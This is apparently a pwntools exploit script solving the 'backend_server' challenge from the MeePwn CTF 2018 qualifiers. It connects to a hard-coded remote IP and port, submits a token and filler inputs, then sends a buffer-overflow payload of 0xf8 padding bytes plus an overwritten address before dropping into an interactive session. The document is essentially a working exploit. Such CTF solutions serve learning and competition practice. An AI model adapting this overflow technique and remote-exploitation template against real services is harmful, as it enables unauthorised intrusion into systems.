MeePwn CTF 2018 Quals 0xBAD MINTON

exploit.py

#!/usr/bin/env python
from pwn import *

context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window

# libc = ELF('')
elf = ELF('./backend_server')
context(os='linux', arch=elf.arch)
context(log_level='debug')  # output verbose log

RHOST = "178.128.84.72"
RPORT = 9997
LHOST = "127.0.0.1"
LPORT = 9997

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

def dbg(ss):
    log.info("%s: 0x%x" % (ss, eval(ss)))

conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
if opt in 'rl':
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    gdbscript = """

    continue
    """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
    conn = gdb.debug(['./backend_server'], gdbscript=gdbscript)
else:
    conn = process(['./backend_server'])
    # conn = process(['./backend_server'], env={'LD_PRELOAD': ''})
    if opt == 'a': gdb.attach(conn)

# exploit
log.info('Pwning')

token = 'c96ad7c54d14a76b9a940d662b18efa77637c2451d8363aa93159d130f4c712f'
conn.sendlineafter('Token>', token)

conn.sendlineafter('What is the course name?>', 'hoge')
conn.sendlineafter('What is the course name?>', 'hoge')
conn.sendlineafter('What is the course name?>', 'hoge')
payload = 'x'*0xf8 + p64(0x604070)
conn.sendlineafter('What is the course name?>', payload)
conn.sendline('3')

conn.interactive()